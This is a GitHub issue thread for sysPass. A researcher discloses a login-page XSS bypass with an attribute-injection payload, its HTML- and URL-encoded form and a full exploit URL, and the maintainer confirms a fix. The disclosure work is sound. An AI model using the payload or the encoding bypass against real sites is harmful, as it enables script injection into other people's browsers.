Insufficient input sanitization on the login page can lead to execution of not trusted Javascript #638
Comments
|
Hello, regarding this notice, I'm wondering if you checked it out against the master branch, because it hasn't been released yet as a release, so any version before 2.1.10 will be affected. Regards. |
|
Hi, I just checked against demo.syspass.org, which I'm guessing is running the latest available version, the provided payload works fine with Firefox : I'm maybe mistaken but I do not see changes on |
|
Hi, you're right, the input parsing method didn't manage this kind of input. This has been solved in the latest commit, by using an aggressive input parsing than only allows chars and numbers by stripping out unwanted special and escaped chars. I really appreciate your pen-testing, because it really allow to get a more secure sysPass. Many thanks for the feedback and PoC! |
Hello,
I found that the issue #615 was kind of interesting for the bypass found by the researcher, so I decided to try to exploit the same page.
It is a bit tricky since the field is hidden but if we accept that a user interaction can be needed for the PoC, the following payload will show you an alert when you press the key combination Alt+Shift+X (Ctrl+Alt+X on OS X):
" accesskey="X" onclick="alert(1)HTML encoded then URL encoded, you get:
%26%23x22%3B%26%23x20%3B%26%23x61%3B%26%23x63%3B%26%23x63%3B%26%23x65%3B%26%23x73%3B%26%23x73%3B%26%23x6B%3B%26%23x65%3B%26%23x79%3B%26%23x3D%3B%26%23x22%3B%26%23x58%3B%26%23x22%3B%26%23x20%3B%26%23x6F%3B%26%23x6E%3B%26%23x63%3B%26%23x6C%3B%26%23x69%3B%26%23x63%3B%26%23x6B%3B%26%23x3D%3B%26%23x22%3B%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x29%3BSo with the URL to the login page of sysPass:
https://<syspass_instance>/?%26%23x22%3B%26%23x20%3B%26%23x61%3B%26%23x63%3B%26%23x63%3B%26%23x65%3B%26%23x73%3B%26%23x73%3B%26%23x6B%3B%26%23x65%3B%26%23x79%3B%26%23x3D%3B%26%23x22%3B%26%23x58%3B%26%23x22%3B%26%23x20%3B%26%23x6F%3B%26%23x6E%3B%26%23x63%3B%26%23x6C%3B%26%23x69%3B%26%23x63%3B%26%23x6B%3B%26%23x3D%3B%26%23x22%3B%26%23x61%3B%26%23x6C%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x29%3BThe reasoning behind the bypass is similar than the one in issue #615, so I don't think it is worth to explicit it any further.
I did not check the rest of application but it is likely that other pages are vulnerable to a similar bypass that do not require user interaction if the same sanitization method is used in another context.
Credits to PortSwigger for the payload: http://blog.portswigger.net/2015/11/xss-in-hidden-input-fields.html
The text was updated successfully, but these errors were encountered: